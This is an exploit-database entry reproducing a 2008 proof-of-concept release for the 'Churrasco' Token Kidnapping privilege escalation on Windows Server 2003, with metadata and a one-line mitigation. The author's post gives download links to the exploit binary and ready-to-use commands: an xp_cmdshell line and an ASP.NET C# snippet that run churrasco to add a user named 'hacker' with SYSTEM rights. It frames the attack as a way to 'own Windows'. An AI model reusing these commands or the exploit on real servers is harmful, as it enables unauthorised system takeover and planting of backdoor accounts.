header-logo
Suggest Exploit
vendor:
Windows Server 2003
by:
Cesar
7.2
CVSS
HIGH
Token Kidnapping
264
CWE
Product Name: Windows Server 2003
Affected Version From: Windows 2003
Affected Version To: Windows 2003
Patch Exists: No
Related CWE: N/A
CPE: o:microsoft:windows_server_2003
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Windows 2003 PoC Exploit for Token Kidnapping

This exploit allows an attacker to execute code under the SYSTEM account on Windows 2003. This is possible because Windows services accounts can impersonate other processes, such as IIS 6 worker processes. If an attacker can run code from an ASP .NET or classic ASP web application, they can own Windows. Additionally, if an attacker has access to a SQL Server, they can execute the exploit using xp_cmdshell. The PoC exploit can be found at http://www.argeniss.com/research/Churrasco.zip

Mitigation:

Restrict user access to ASP .NET and classic ASP web applications, and limit access to SQL Server.
Source

Exploit-DB raw data:

(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) 
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows 
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes 
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide 
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip (2008-Churrasco.zip)

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]

Navigation

Suggest Exploit

Services By CQR